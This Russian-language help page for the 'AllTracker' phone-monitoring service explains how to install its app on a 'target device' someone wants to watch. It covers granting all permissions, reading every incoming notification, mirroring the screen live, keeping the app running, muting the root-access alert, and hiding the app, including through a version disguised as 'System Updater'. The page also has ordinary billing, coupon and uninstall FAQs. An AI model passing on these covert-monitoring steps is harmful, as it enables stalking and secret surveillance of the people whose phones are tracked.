Как подключить телефон к сайту?

1. Загрузите приложение, используя эту ссылку: Скачать APK
2. Установите и запустите приложение на целевом устройстве (которое должно мониториться)

3. Нажмите на ПОДКЛЮЧИТЬ

4. Нажмите на ОПТИМИЗИРОВАТЬ ПРОГРАММУ, чтобы быть уверенным, что приложение работает в любое время

5. Нажмите на ПРЕДОСТАВЬТЕ ВСЕ НЕОБХОДИМЫЕ РАЗРЕШЕНИЯ, чтобы приложение могло получить доступ ко всем данным, которые вы запросите с этого веб-сайта

6. Нажмите на РАЗРЕШИТЬ ЧИТАТЬ ОПОВЕЩЕНИЯ, если вы хотите читать все входящие сообщения с устройства


7. Нажмите на РАЗРЕШИТЬ ДУБЛИРОВАНИЕ ЭКРАНА, если вы хотите в живую наблюдать за экраном устройства через этот сайт

8. Перейдите по ссылке alltracker.org/code, чтобы получить код подключения к вашему аккаунту

9. Введите код с веб-страницы на устройстве, которое вы хотите контролировать, или просто сканируйте QR-код

10. Вы закончили, ваше устройство подключено к вашей учетной записи. Теперь вы можете мониторить его на странице Мониторинг
Смотрите видео, как подключить телефон к вашему аккаунту :

Как работает платежная система?

Абонемент: Подписка на неограниченные запросы

- Как часто я плачу и за что?
A.1. Вы платите ежемесячную/годовую плату за доступ ко всем услугам сервиса, включая живую передачу звука и видео. За исключением «Использовать Фавориты» с планом BRONZE. Продление на следующий период будет производиться автоматически, если подписка не будет отменена в оплаченный период.

- Сколько устройств я могу отслеживать под одной подпиской?
A.2. У Вас ЕСТЬ ограничение по количеству зарегистрированных устройств (Bronze - 1 устройство, Silver - 3 устройства, Gold - 5 отслеживаемых устройств).

- Когда я могу отменить подписку? Будет мой доступ сразу закрыт, после того, как я закрою подписку?
A.3. Если Вы подписались на один из планов, то Вы можете тут же от него отписаться (отменить). В этом случае до конца платежного периода ваш абонемент будет активный. Когда подойдет время до следующей оплаты, ваш абонемент будет остановлен, и деньги сниматься больше не будут.

- Могу ли я опять активировать подписку после отмены? С меня опять снимут деньги?
A.4. Если Вы отписались от какого-либо плана, то вы можете в любой момент подписаться на него назад. В этом случае с Вашего счета не будет сниматься дополнительная оплата. Следующая оплата будет произведена по окончанию актуального платежного периода.

- Я хочу улучшить план, мне нужно ждать до конца актуального периода, чтобы с меня не сняли полную сумму за новый план?
A.5. Если Вы хотите подписаться на более высший план, то вы можете сделать это в любое время. В этом случае остаток денег за актуальный период будет засчитан на новую подписку и вы заплатите только разницу в цене.


Предоплата: Разовая покупка

- Будут ли с меня сниматься регулярно деньги при предоплате?
P.1. Вы покупаете разово один из планов на определенное количество дней. Деньги регулярно сниматься не будут. Как только оплаченный период пройдет, план автоматически закроется. После чего вы сможете купить один из планов заново.

- Сколько устройств я могу подключить с предоплатой?
P.2. В зависимости от того, какой план вы покупаете: Bronze - 1 устройство, Silver - 3 устройства, Gold - 5 отслеживаемых устройств


Trial: Пробный период

T.1. При регистрации на сайте Вы получите бесплатный доступ ко всем услугам сервиса в течении 6 часов


Если у Вас есть какие-либо проблемы с подпиской, оплатой, или вы считаете, что у вас были не верно сняты деньги, то обратитесь к нам через службу поддержки, мы постараемся в короткие сроки решить Вашу проблему.

Как полностью удалить 'AllTracker' с телефона?

Android < 6.0:
Зайдите в 'Настройки', затем 'Диспетчер приложений', затем 'AllTracker', после чего 'Очистить Данные' и в конце 'Удалить'

Android > 6.0:
Зайдите в 'Настройки', затем 'Приложения', затем 'Диспетчер приложений', затем 'AllTracker', затем 'Память', после чего 'Очистить Данные' и 'Очистить Кэш' и в конце вернуться назад и нажать на 'Удалить'

Как убрать сообщение 'Приложению AllTracker предоставлены права суперпользователя?

Это сообщение появляется каждый раз, когда вы вызываете команду, которой нужен РУТ:


Для того, чтобы убрать это сообщение, перейдите в настройки Суперпользователя и выберите 'Уведомления'


Затем выберите'Выключены'

Мой телефон не отвечает на запросы с сайта, через какое то время, хотя программа установлена и зарегистрированна под мой gmail. Почему?

1. Действие
1. Установите последнюю версию программы AllTracker Anti-Thief v.5.6 или System Updater v.5.6 из раздела Установка.
2. После запуска программы нажмите на УСТАНОВИТЬ SERVICE CHECKER.
3. Установите программу по окончанию загрузки.
4. Вернитесь в AllTracker и нажмите на ЗАПУСТИТЬ SERVICE CHECKER.
5. Откроется окно сервиса. В зависимости от того, как бы вы хотели, чтобы батарея сохранялась, выберите соответствующий интервал. Рекомендуется 3 минутный интервал. Подтвердите ЗАПУСТИТЬ СЕРВИС.
6. Если вы видите, что иконка сервиса засветилась зеленым светом, значит сервис удачно запущен и будет в фоновом режиме следить за тем, чтобы AllTracker "не засыпал".

Вы так же можете скачать Service Checker на прямую ЗДЕСЬ

2. Действие
Войдите в Настройки -> Батарея -> ПОДРОБНО -> Энергопотребление приложений -> ВЫКЛЮЧИТЬ!

-> ->
3. Действие
Пожалуйста проверьте, установлена ли у вас программа 'Smart manager' или находится в настройках телефона:

 

Если да, то запустите ее, и выберите'Батарея'


Потом выберите 'Подробно'


Убедитесь что опция 'Выключена'

Как скрыть AllTracker?

1. Для того чтобы скрыть AllTracker вам нужно установить версию AllTracker Анти-Вор или System Updater.
2. После установки программы и подключению ее к вашему аккаунту, выберите команду СКРЫТЬ ПРОГРАММУ.

Уведомления не отслеживаются! Что нужно сделать, чтобы заработало?

1. Для того чтобы AllTracker отслеживал оповещения, нужно в программе нажать на Открыть Настройки.
2. После того, как откроются настройки, необходимо включить доступ программе к уведомлениям!
3. Затем вернитесь назад, иконка с оповещениями должна подсветится зеленой точкой, это значит, что программа имеет доступ к оповещениям!
4. Так же в уведомлениях появится сообщение от AllTracker, о том что есть доступ к уведомлениям. Его можно убрать, оно больше появлятся не будет.

Если программа по какой-либо причине все еще не получает уведомления, то попробуйте ее полностью переустановить. Перед переустановкой, убедитесь, что программа полностью удалена с вашего телефона, как это описанно в пунке выше.

Как использовать купоны? (Скидка на подписку)

1. Заходим на страницу с ценами и подписками сюда: Цены и Подписки
2. Выбираем план по желанию и потребностям и нажимаем на "ПОДПИСАТЬСЯ".



3. После того, как вы заполнили поля с вашей кредитной картой, введите в поле "Купон" ваш купон на скидку!



4. Если купон и ваша карта действительны, то вы увидите информацию о скидке и ее продолжительности.



5. В вашем профиле можно в любой момент посмотреть и отменить актуальную подписку.



Если по какой-либо причине что-то пошло не так, то пожалуйста обратитесь в Службу Поддержки!